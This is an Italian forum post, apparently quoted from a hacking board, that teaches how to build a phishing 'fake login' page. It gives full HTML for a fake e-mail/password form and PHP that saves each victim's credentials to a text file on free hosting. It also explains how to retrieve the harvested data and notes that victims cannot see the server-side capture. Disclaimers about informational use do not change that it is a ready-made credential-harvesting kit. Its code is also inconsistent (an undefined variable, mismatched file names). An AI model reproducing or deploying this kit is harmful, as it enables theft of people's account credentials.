CITAZIONE
Il Fake Login è una schermata di login, ad un certo servizio, fittizia. Infatti essa, o immagazzina i dati oppure li spedisce ad un certo indirizzo eMail.
I Fake Login sono spesso trasmessi via eMail, e si riconoscono dal link di destinazione. Attraverso fake login si possono rubare indirizzi email
Ok, faccio anche un'altra guida su come realizzare un Fake Login, ricordo che è puramente a scopo informativo e non mi assumo nessuna responsabilità di quello che qualche lamerozzo decidesse di fare! Quello che spiego si può benissimo conoscere studiando un minimo di html e php.
Occorrenti base:
-Un blocco note
-Spazio su web che gestisce anche documenti php ( consiglio altervista )
-Fantasia
Bene apriamo il blocco note e scriviamo:
CODICE
<html>
<head>
<title>PROVA DI UN FAKE LOGIN</title>
</head>
<body>
<!-- Creiamo un form che invia i dati col metodo "POST" per non far vedere niente all'utente a una pagina di nome fakelogin.php che costruiremo successivamente che servirà a prendere i dat inviati -->
<form name="fake login" method="post" action="fakelogin.php">
E-mail: <input type="text" value="" name="nome"><br>
Password: <input type="password" value="" name="pass"><br>
<input type="submit" name="invia" value="INVIA" >
</form>
</body>
</html>
Bene salviamo il tutto come "fakelogin.htm"
Ora come avrete sicuramente visto dal form invia col metodo "post" i dati a una pagina chiamata "fakelogin.php"
Ora non ci resta che prendere quei dati!
Apriamo di nuovo il blocco note e scriviamo:
CODICE
<html>
<head>
<title>Dati inviati</title>
</head>
<body>
Grazie per aver inviato i dati.
<!-- Ora arriva la parte in php che nel sorgente finale visibile all'utente non ci sarà -->
<?php
/* Recuperiamo i dati.. */
$email = $_POST['nome'];
$password = $_POST['pass'];
/* Apriamo il file Contatti.txt per l'aggiunta di testo */
$fakefile = fopen("Contatti.txt", "a");
/* Scriviamo i dati */
fwrite($fakefile, "Email: $email Password: $pass\n");
/* Chiudiamo il file */
fclose($fakefile);
?>
</body>
</html>
Salviamo tutto col nome fakelogin.php
Ecco come avete visto questo documento apre per l'aggiunta di testo un file di nome "dati.txt" e scrive in modo ordinata ognuno su ogni riga, l'email e la password di colui che ha fatto il login.
Ora non ci resta che creare un file di nome Contatti.txt e scrivere:
CODICE
##########################################
# PAGINA DI ARCHIVIAZIONE DATI INVIATI #
# TRAMITE IL NOSTRO FAKE LOGIN #
##########################################
carichiamo il tutto online et voilà fake login pronto.
bastera accedere all'indirizzo:
http://tuosito.altervista.org/fakelogin.htminserire dei dati e premere INVIA automaticamente i dati saranno scritti sul file dati.txt quindi per controllare i dati basta andare all'indirizzo:
http://tuosito.altervista.org/dati.txt e li abbiamo belli incolonnati
Il bello di questa tecnica è che operando col php e quindi facendo girare tutto sul lato server l'utente non vedrà mai e poi mai cosa fa la pagina...
Beh chiudo qui i possibili usi di questa cosa penso siano venuti in mente un pò a tutti. ripeto ancora una volta NO LAMEROZZI un conto è informarsi e sono completamente pro a qualunque tipo di informazione ma che rimanga informazione e non si usano le cose imparata per provocare danni a altri utenti, anche perchè qui si entra nella illegalità se si effettuano attacchi di "phishing"..... spero di essermi spiegato.
Ciauz
P.s.: Ricordo anche che è vietato dalle linee guida di altervista ( ma è anche punibile dalla legge ) fare attacchi di phishing.